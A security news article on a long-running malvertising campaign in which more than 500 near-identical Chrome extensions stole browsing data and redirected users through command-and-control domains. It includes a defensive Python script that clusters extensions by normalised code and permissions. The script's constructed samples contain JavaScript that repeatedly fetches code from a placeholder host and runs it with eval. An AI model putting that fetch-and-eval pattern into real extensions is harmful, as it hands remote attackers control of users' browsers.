Researchers have uncovered and dismantled a long-running malvertising and ad-fraud network that relied on an extensive set of nearly identical Chrome extensions to gather users' private browsing data and direct them to potentially malicious sites.
The campaign began in early 2019 and grew over the course of several months, as the actor behind it added new extensions, plugins, and domains. Security researcher Jamila Kaya discovered the campaign after identifying several Chrome extensions that pretended to be offering ad services but were actually stealing data and redirecting victims to a variety of ad-laden sites. Kaya contacted researchers at Duo about the shady extensions and together they used the CRXcavator tool, which automatically scans and assigns a risk score to Chrome extensions, to identify dozens of extensions that all matched a specific pattern. The 70 extensions had been installed by more than 1.7 million people.
But there were far more extensions connected to this campaign than just those 70. After Duo and Kaya contacted Google, the company’s researchers fingerprinted the suspect extensions and eventually discovered more than 500 extensions that were connected to this campaign and removed them from the Chrome Web Store. CRXcavator was developed internally at Duo to assess the risk of new extensions, but it was released as a free service last year.
“In the case reported here, the Chrome extension creators had specifically made extensions that obfuscated the underlying advertising functionality from users. This was done in order to connect the browser clients to a command and control architecture, exfiltrate private browsing data without the users’ knowledge, expose the user to risk of exploit through advertising streams, and attempt to evade the Chrome Web Store’s fraud detection mechanisms,” Kaya and Jacob Rickerd, an information security engineer at Duo, said in an analysis of the campaign and extensions.
The campaign that Kaya identified used a complex network of plugins and domains to generate ad revenue for the actor behind it. The extensions have deep connections through their source code, command-and-control infrastructure, and naming conventions.
“The plugins have almost no ratings, and the source code of the plugins is nearly identical to each other. The only substantial differences in the source code are the names of the functions. With a much larger number than similar plugins and services, it’s likely that a single change of all the function names reduces the similarity to other plugins enough to avoid detection mechanisms,” Kaya and Rickerd said.
“The level of permissions requested on each plugin is similarly high and is identical between them, allowing it to access a large amount of data in the browser. In addition, the external sites contacted are identical between all the plugins involved, with the exception of the plugin ‘front’ site.”
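The two quotes above describe a fingerprint a defender can reproduce: normalise each extension's scripts so that renamed function names and the per-plugin "front" URL no longer affect the result, then cluster on that structural hash together with the manifest permission set. This is an added example, not code from CRXcavator or from the campaign; the three extension bundles, their names and their URLs are constructed samples.

```python
import hashlib
import json
import re

# Constructed sample extension bundles (file name -> contents), standing in for
# unpacked extensions. They are not code from the campaign described above.
EXT_A = {
    "manifest.json": json.dumps({"name": "Ad Helper One", "permissions": [
        "tabs", "webRequest", "webRequestBlocking", "<all_urls>", "storage"]}),
    "background.js": "function zqa(u){fetch(u).then(r=>r.text()).then(t=>eval(t));}\n"
                     "setInterval(function(){zqa('https://front-a.example/cfg')},60000);",
}
EXT_B = {  # same code as EXT_A, only the function name and front URL differ
    "manifest.json": json.dumps({"name": "Coupon Saver Pro", "permissions": [
        "storage", "<all_urls>", "webRequestBlocking", "webRequest", "tabs"]}),
    "background.js": "function pmx(u){fetch(u).then(r=>r.text()).then(t=>eval(t));}\n"
                     "setInterval(function(){pmx('https://front-b.example/cfg')},60000);",
}
EXT_C = {  # unrelated, low-permission extension that must not cluster with A/B
    "manifest.json": json.dumps({"name": "Dark Mode Toggle", "permissions": ["storage"]}),
    "background.js": "chrome.storage.local.get('dark',function(v){document.body.classList.toggle('dark',v.dark);});",
}

_DECL = re.compile(r"\b(?:function|var|let|const)\s+([A-Za-z_$][\w$]*)")
_STRING = re.compile(r"'[^']*'|\"[^\"]*\"")

def normalize_js(src):
    """Canonical form of a script, invariant to renamed declared identifiers,
    string literal contents (e.g. the per-plugin front URL), comments and whitespace."""
    src = _STRING.sub("'S'", src)                                # mask strings first, so
    src = re.sub(r"//[^\n]*|/\*.*?\*/", "", src, flags=re.S)     # '//' in URLs survives
    for i, name in enumerate(dict.fromkeys(_DECL.findall(src))):  # stable order, no dupes
        src = re.sub(r"\b%s\b" % re.escape(name), "_id%d" % i, src)
    return re.sub(r"\s+", "", src)

def fingerprint(ext):
    """(structural code hash, sorted permission tuple) for one unpacked extension."""
    manifest = json.loads(ext["manifest.json"])
    code = "".join(normalize_js(v) for k, v in sorted(ext.items()) if k.endswith(".js"))
    code_hash = hashlib.sha256(code.encode()).hexdigest()[:16]
    return code_hash, tuple(sorted(manifest.get("permissions", [])))

def cluster(exts):
    """Group extension names whose structural hash and permission set both match."""
    groups = {}
    for ext in exts:
        groups.setdefault(fingerprint(ext), []).append(json.loads(ext["manifest.json"])["name"])
    return groups
```

Any group with more than one member and a broad permission set (`<all_urls>`, `webRequest`) is a candidate for the kind of near-duplicate family described in the quotes.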
Once one of the extensions is on a victim’s machine, it contacts a specific domain associated with that plugin and then tries to connect to one of three other hard-coded domains. Those domains are the C2 infrastructure, and victims’ browsers connect to them at irregular intervals to get new instructions, such as where to upload new data and where new redirects should go. The domains the actor uses for all of this activity are generally hosted on AWS and have similar names.
“The primary malicious activity and ad fraud occurs through the redirection streams. The user regularly receives new redirector domains, as they are created in batches, with multiple of the earlier domains being created on the same day and hour. They all operate in the same way, receiving the signal from the host and then sending them to a series of ad streams, and subsequently to legitimate and illegitimate ads,” Kaya and Rickerd said.
Although a sizable chunk of the ad streams that victims see in this campaign are legitimate, 60 to 70 percent of the streams that include a redirect point to a malicious site. During her research, Kaya also identified two domains tied to the campaign that were distributing malware. Although the campaign that Kaya uncovered appears to have started in January 2019, some of the infrastructure was created as far back as 2017, and new redirector domains were registered as recently as April.